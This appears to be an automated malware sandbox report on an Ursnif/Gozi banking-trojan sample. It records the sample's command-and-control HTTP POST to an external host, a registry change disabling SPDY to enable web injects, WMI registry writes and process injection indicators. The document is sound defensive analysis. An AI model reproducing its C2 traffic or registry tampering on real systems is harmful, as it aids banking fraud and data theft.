HTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

8_2_010A7479

System Summary:

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Detected potential crypto function

Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304C124	2_2_0304C124
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E56A	2_2_0304E56A
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_0304E570	2_2_0304E570
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C27060	2_2_07C27060
Source: C:\Users\user\Desktop\gozi.exe	Code function: 2_2_07C26030	2_2_07C26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A7F60	8_2_010A7F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6B67	8_2_010A6B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_010A6DD3	8_2_010A6DD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F163BC	8_2_03F163BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1A241	8_2_03F1A241
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1F1EE	8_2_03F1F1EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F178F1	8_2_03F178F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0C086	8_2_03F0C086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F0504A	8_2_03F0504A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F1CF97	8_2_03F1CF97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F095FE	8_2_03F095FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F09D64	8_2_03F09D64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 8_2_03F034DC	8_2_03F034DC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7AB44	28_2_00E7AB44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7B58C	28_2_00E7B58C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E686D0	28_2_00E686D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E640E8	28_2_00E640E8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E568FC	28_2_00E568FC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E54080	28_2_00E54080
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53890	28_2_00E53890
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E79858	28_2_00E79858
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E68024	28_2_00E68024
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78820	28_2_00E78820
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E65828	28_2_00E65828
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E62804	28_2_00E62804
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6B008	28_2_00E6B008
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6A808	28_2_00E6A808
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E531D4	28_2_00E531D4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E66190	28_2_00E66190
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6194B	28_2_00E6194B
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5B154	28_2_00E5B154
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E75954	28_2_00E75954
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E652CC	28_2_00E652CC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E512BC	28_2_00E512BC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E67BFC	28_2_00E67BFC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E53BA4	28_2_00E53BA4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72BA0	28_2_00E72BA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E72330	28_2_00E72330
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5DCA8	28_2_00E5DCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6CCA8	28_2_00E6CCA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E644B4	28_2_00E644B4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5C49C	28_2_00E5C49C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6BC10	28_2_00E6BC10
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E59DF0	28_2_00E59DF0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78DA0	28_2_00E78DA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E7C588	28_2_00E7C588
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77D6C	28_2_00E77D6C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E60544	28_2_00E60544
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E74530	28_2_00E74530
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6751C	28_2_00E6751C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5A6D0	28_2_00E5A6D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E77EA0	28_2_00E77EA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E73E2C	28_2_00E73E2C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E61618	28_2_00E61618
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E737D0	28_2_00E737D0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E78FA8	28_2_00E78FA8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E57F64	28_2_00E57F64
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E5CF44	28_2_00E5CF44
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E69740	28_2_00E69740
Source: C:\Windows\System32\control.exe	Code function: 28_2_00E6FF4C	28_2_00E6FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA986D0	36_2_0000020FDEA986D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAAB44	36_2_0000020FDEAAAB44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8A6D0	36_2_0000020FDEA8A6D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA812BC	36_2_0000020FDEA812BC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA952CC	36_2_0000020FDEA952CC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7EA0	36_2_0000020FDEAA7EA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA37D0	36_2_0000020FDEAA37D0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9BC10	36_2_0000020FDEA9BC10
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA95828	36_2_0000020FDEA95828
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8820	36_2_0000020FDEAA8820
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA98024	36_2_0000020FDEA98024
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA97BFC	36_2_0000020FDEA97BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9B008	36_2_0000020FDEA9B008
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9A808	36_2_0000020FDEA9A808
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA92804	36_2_0000020FDEA92804
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA87F64	36_2_0000020FDEA87F64
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2330	36_2_0000020FDEAA2330
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9FF4C	36_2_0000020FDEA9FF4C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA99740	36_2_0000020FDEA99740
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8CF44	36_2_0000020FDEA8CF44
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8FA8	36_2_0000020FDEAA8FA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA2BA0	36_2_0000020FDEAA2BA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83BA4	36_2_0000020FDEA83BA4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA940E8	36_2_0000020FDEA940E8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA944B4	36_2_0000020FDEA944B4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9751C	36_2_0000020FDEA9751C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA868FC	36_2_0000020FDEA868FC
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA9858	36_2_0000020FDEAA9858
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8C49C	36_2_0000020FDEA8C49C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA83890	36_2_0000020FDEA83890
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8DCA8	36_2_0000020FDEA8DCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9CCA8	36_2_0000020FDEA9CCA8
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA84080	36_2_0000020FDEA84080
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA831D4	36_2_0000020FDEA831D4
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA91618	36_2_0000020FDEA91618
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA3E2C	36_2_0000020FDEAA3E2C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA89DF0	36_2_0000020FDEA89DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA8B154	36_2_0000020FDEA8B154
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA5954	36_2_0000020FDEAA5954
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA7D6C	36_2_0000020FDEAA7D6C
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA4530	36_2_0000020FDEAA4530
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA9194B	36_2_0000020FDEA9194B
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA90544	36_2_0000020FDEA90544
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEA96190	36_2_0000020FDEA96190
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAA8DA0	36_2_0000020FDEAA8DA0
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAC588	36_2_0000020FDEAAC588
Source: C:\Windows\System32\rundll32.exe	Code function: 36_2_0000020FDEAAB58C	36_2_0000020FDEAAB58C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030463BC	47_2_030463BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304A241	47_2_0304A241
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304F1EE	47_2_0304F1EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303504A	47_2_0303504A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0303C086	47_2_0303C086
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030478F1	47_2_030478F1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_0304CF97	47_2_0304CF97
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03039D64	47_2_03039D64
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030395FE	47_2_030395FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_03055430	47_2_03055430
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 47_2_030334DC	47_2_030334DC

Contains functionality to launch a process as a different user

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F0E6B9 CreateProcessAsUserA,

8_2_03F0E6B9

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Contains functionality to call native functions

